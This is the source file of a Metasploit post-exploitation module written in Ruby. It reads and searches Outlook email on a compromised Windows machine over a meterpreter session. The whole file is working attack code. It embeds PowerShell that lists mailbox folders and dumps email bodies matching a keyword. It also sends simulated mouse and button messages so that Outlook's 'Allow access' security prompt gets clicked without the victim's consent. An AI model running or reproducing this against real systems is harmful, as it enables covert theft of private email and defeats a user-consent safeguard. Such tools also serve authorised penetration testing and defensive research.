metasploit-framework/modules/post/windows/gather/outlook.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Post::Windows::Powershell

        A_HASH = { "en_US" => "Allow", "NL" => "Toestaan", "de_DE" => "Erteilen", "de_AT" => "Erteilen" }
        ACF_HASH = { "en_US" => "Allow access for", "NL" => "Toegang geven voor", "de_DE" => "Zugriff gew\xc3\xa4hren f\xc3\xbcr", "de_AT" => "Zugriff gew\xc3\xa4hren f\xc3\xbcr" }

  def initialize(info={})
    super(update_info(info,
    'Name'          => 'Windows Gather Outlook Email Messages',
    'Description'   => %q{
      This module allows you to read and search email messages from the local Outlook installation using powershell. Please note that this module is manipulating the victims keyboard/mouse.
      If a victim is behind the target system, he might notice the activities of this module. Tested on Windows 8.1 x64 with Office 2013.
    },
    'License'       => MSF_LICENSE,
    'Author'        => [ 'Wesley Neelen <security[at]forsec.nl>' ],
    'Platform'      => [ 'win' ],
    'Arch'	    => [ 'x86', 'x64' ],
    'SessionTypes'  => [ 'meterpreter'],
    'Actions' => [
                       [ 'LIST', { 'Description' => 'Lists all folders' } ],
                       [ 'SEARCH', { 'Description' => 'Searches for an email' } ]
    ],
    'DefaultAction' => 'LIST'
  ))

  register_options(
  [
    OptString.new('FOLDER', [ false, ' The e-mailfolder to read (e.g. Inbox)' ]),
    OptString.new('KEYWORD', [ false, ' Search e-mails by the keyword specified here' ]),
    OptString.new('A_TRANSLATION', [ false, ' Fill in the translation of the word "Allow" in the targets system language, to click on the security popup.' ]),
    OptString.new('ACF_TRANSLATION', [ false, ' Fill in the translation of the phrase "Allow access for" in the targets system language, to click on the security popup.' ]),
    ], self.class)
  end

  def listBoxes
    # This function prints a listing of available mailbox folders
    psh_script = %Q|
    function GetSubfolders($root) {
        $folders = @()
        $folders += $root
        foreach ($folder in $root.Folders) {
            $folders += GetSubfolders($folder)
        }
        return $folders
    }
    function List-Folder {
        Clear-host
        Add-Type -Assembly "Microsoft.Office.Interop.Outlook"
        $Outlook = New-Object -ComObject Outlook.Application
        $Namespace = $Outlook.GetNameSpace("MAPI")
        $account = $NameSpace.Folders
        $folders = @()
        foreach ($acc in $account) {
            foreach ($folder in $acc.Folders) {
                $folders += GetSubfolders($folder)
            }
        }
        $folders \| FT FolderPath
    }
    List-Folder
    |
    compressed_script = compress_script(psh_script)
    cmd_out, runnings_pids, open_channels = execute_script(compressed_script)
    while(d = cmd_out.channel.read)
       print ("#{d}")
    end
    currentidle = session.ui.idle_time
    print("\n")
    print_status("System has currently been idle for #{currentidle} seconds")
  end

  def readEmails(folder,keyword,searchobject,atrans,acftrans)
    # This functions reads Outlook using powershell scripts
    view = framework.threads.spawn("ButtonClicker", false) {
      clickButton(atrans,acftrans)
    }
    psh_script = %Q|
      function Get-Emails {
      param ([String]$searchTerm,[String]$Folder,[String]$searchObject)
      Add-Type -Assembly "Microsoft.Office.Interop.Outlook"
      $Outlook = New-Object -ComObject Outlook.Application
      $Namespace = $Outlook.GetNameSpace("MAPI")
      $account = $NameSpace.Folders
      $count = 0
      foreach ($acc in $account) {
         $count = $count+1
         try {
         $Email = $NameSpace.Folders.Item($count).Folders.Item($Folder).Items
         $Email \| Where-Object {$_.$searchObject -like '*' + $searchTerm + '*'} \| Format-List To, SenderEmailAddress, CreationTime, TaskSubject, HTMLBody
         } catch {
         Write-Host "Folder not found in mailbox $count"
         }
        }
      }
      Get-Emails "#{keyword}" "#{folder}" "#{searchobject}"
    |
    compressed_script = compress_script(psh_script)
    cmd_out, runnings_pids, open_channels = execute_script(compressed_script, 120)
    while(d = cmd_out.channel.read)
       print ("#{d}")
    end
  end

  def clickButton(atrans,acftrans)
    # This functions clicks on the security notification generated by Outlook.
    sleep 1
    hwnd = client.railgun.user32.FindWindowW(nil, "Microsoft Outlook")
    hwndChildCk = client.railgun.user32.FindWindowExW(hwnd['return'], nil, "Button", "&#{acftrans}")
    client.railgun.user32.SendMessageW(hwndChildCk['return'], 0x00F1, 1, nil)
    client.railgun.user32.MoveWindow(hwnd['return'],150,150,1,1,true)
    hwndChild = client.railgun.user32.FindWindowExW(hwnd['return'], nil, "Button", "#{atrans}")
    client.railgun.user32.SetActiveWindow(hwndChild['return'])
    client.railgun.user32.SetForegroundWindow(hwndChild['return'])
    client.railgun.user32.SetCursorPos(150,150)
    client.railgun.user32.mouse_event(0x0002,150,150,nil,nil)
    client.railgun.user32.SendMessageW(hwndChild['return'], 0x00F5, 0, nil)
  end

  def run
    # Main method
    folder	= datastore['FOLDER']
    keyword = datastore['KEYWORD'].to_s
    object	= "HTMLBody"
    allow 	= datastore['A_TRANSLATION']
    allow_access_for = datastore['ACF_TRANSLATION']
    langNotSupported = true

    # OS language check
    sysLang = client.sys.config.sysinfo['System Language']
    A_HASH.each do |key, val|
        if sysLang == key
           langNotSupported = false
           atrans = A_HASH[sysLang]
           acftrans = ACF_HASH[sysLang]
        end
    end

    if allow and allow_access_for
       atrans = allow
       acftrans = allow_access_for
    else
       if langNotSupported == true
           print_error ("System language not supported, you can specify the targets system translations in the options A_TRANSLATION (Allow) and ACF_TRANSLATION (Allow access for)")
           abort()
       end
    end

    # Outlook installed
    @key_base = "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
    outlookInstalled = registry_getvaldata("#{@key_base}\\", "NextAccountID")

    if !outlookInstalled.nil?
      if outlookInstalled != 0
        print_good "Outlook is installed"
      else
        print_error "Outlook is not installed"
        abort()
      end
    end

    # Powershell installed check
    powershellInstalled = registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\").include?("PowerShell")

    if !powershellInstalled.nil?
      if powershellInstalled != 0
        print_good("Powershell is installed on this system.")
      else
        print_error("Powershell is not installed")
        abort()
      end
    end

    # Check whether target system is locked
    locked = client.railgun.user32.GetForegroundWindow()['return']
    if locked == 0
      print_error("Target system is locked. This post module cannot click on Outlooks security warning when the target system is locked")
      abort()
    end

    if action.name == "LIST"
      print_good('Available folders in the mailbox: ')
      listBoxes()
    end

    if action.name == "SEARCH"
      readEmails(folder,keyword,object,atrans,acftrans)
    end
  end
end